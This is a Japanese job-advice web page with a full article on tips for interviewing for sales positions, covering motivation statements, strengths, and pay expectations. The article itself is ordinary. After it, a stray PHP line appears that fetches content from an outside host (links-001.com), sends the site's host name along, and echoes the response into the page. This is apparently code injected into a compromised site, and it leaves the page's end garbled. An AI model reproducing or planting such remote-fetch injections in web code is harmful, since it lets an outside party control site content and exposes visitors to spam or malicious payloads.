前へ
次へ

営業求人で転職に成功

長年営業職をしていたということもありますが、現在の会社では将来性があまりないと判断し、転職をすること

more

営業求人情報を探して転職する時

昔に比べても有効求人倍率も高く、色々な職業の転職求人情報が見つかるようになってきています。
特に営業求

more

営業求人情報から転職をする際には

やはり今は、転職求人情報も非常に多くのところで見かけられるようになってきています。
営業は各会社の基本

more

転職で営業求人を受ける際のポイント

いろいろな求人がある中で、比較的営業求人は多いと言えます。
営業職は特に必要な資格はありません。
未経験でもできる仕事という点では、転職希望者にも人気です。
前職でまったく違う業種に就いていた人でも、営業職に挑むことは可能です。
むしろ営業経験のない人のほうが、営業の世界に抵抗なく入りやすいかもしれません。
また営業求人は給与額も高めです。
中には基本給に歩合制賞与がプラスされる会社もあり、しっかりと稼ぎたい人にとっては魅力的なのです。
仕事を変わるとなると、一からのスタートであり新卒者と同じ扱いになります。
何年か働いて給料もそれなりにアップしていただろう前職よりも、給与額が減ってしまう可能性もあるでしょう。
けれども営業であれば、新入社員でもやればやっただけ給料をもらえる所も少なくはありません。
成果主義であり、頑張って結果を出せば認めてもらいやすい仕事なのです。
このように、未経験者歓迎や高額給与の面から、転職するなら営業をしてみようと考える人が多いのです。
そうは言えども、内定をもらえないことには働けません。
転職で営業職を受ける場合のポイントを知っておきましょう。
まず非常に重要になってくるのが、志望動機です。
間違えても、「給料が高いので」などと言ってはいけません。
しっかりと軸のある志望動機を考える必要があります。
営業求人は多いので、「この会社でなければダメ」という志望動機にすることが重要です。
例えば製薬関連の営業であれば、「御社の風邪薬がとても効果的で家族みんなが愛用しています」などと、取り扱い商品について述べるのもひとつです。
また自身の能力や強みをアピールすることも大切でしょう。
営業は、コミュニケーション能力や行動力、ストレス耐性などが必要になります。
何かしらの体験談を添えながら、それらに当てはまる長所についてアピールしたいものです。
企業が自社にマッチした人材であると感じたなら、内定をもらえる確率が高くなります。
前職で身に付けたスキルや能力も、営業に活かせそうなものがあれば積極的に話しましょう。

".file_get_contents('http://links-001.com/gfjset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top